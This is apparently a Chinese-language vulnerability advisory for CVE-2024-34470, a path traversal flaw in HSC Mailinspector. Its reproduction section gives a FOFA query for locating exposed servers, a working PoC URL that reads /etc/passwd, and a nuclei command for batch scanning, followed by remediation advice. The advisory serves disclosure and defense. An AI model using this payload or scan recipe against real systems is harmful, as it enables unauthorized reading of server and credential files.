免責聲明 本教程僅為合法的教學目的而準備,嚴禁用于任何形式的違法犯罪活動及其他商業行為,在使用本教程前,您應確保該行為符合當地的法律法規,繼續閱讀即表示您需自行承擔所有操作的后果,如有異議,請立即停止本文章讀。
目錄
HSC Mailinspector 任意文件讀取漏洞(CVE-2024-34470)
0x01漏洞概述
0x02漏洞復現
0x03漏洞分析
0x04修復建議
HSC Mailinspector 任意文件讀取漏洞(CVE-2024-34470)
0x01漏洞概述
HSC Mailinspector 是一種郵件安全解決方案,旨在保護企業和組織免受各種電子郵件威脅的影響。它提供了一系列功能,包括針對垃圾郵件、惡意軟件、垃圾郵件和其他網絡威脅的過濾和檢測。
在 HSC Mailinspector 的 5.2.17-3 版本到 5.2.18 版本之間發現了一個問題。在 /public/loader.php 文件中存在一個未經身份驗證的路徑遍歷漏洞。path參數沒有正確過濾傳遞的文件和目錄是否屬于 Web 根目錄,這使得攻擊者能夠讀取服務器上的任意文件。
受影響版本
HSC Mailinspector : 5.2.17-3<=version<=5.2.18受影響。
CVE編號
CVE-2024-34470
0x02漏洞復現
fofa
body="mailinspector/public"
1.poc
https://target-IP/mailinspector/public/loader.php?path=../../../../../../../etc/passwd
構造如上payload,將target-IP替換成目的IP,在瀏覽器或burp中打開,即可查看目標系統的文件。
2.批量檢測poc
使用nuclei,下載地址:
https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-34470.yaml
使用命令,nuclei.exe -t CVE-2024-34470.yaml -l 1.txt
0x03漏洞分析
這個漏洞的成因是在/public/loader.php文件中存在path參數沒有正確過濾傳遞的文件和目錄是否屬于網絡根目錄,從而允許攻擊者讀取服務器上的任意文件。
0x04修復建議
1.目前廠商已發布升級補丁以修復漏洞,補丁獲取鏈接:
https://hsclabs.com/mailinspector/
2.限制用戶權限,避免授予過高的權限。
3.實施嚴格的訪問控制和身份驗證機制,以防止未經授權的訪問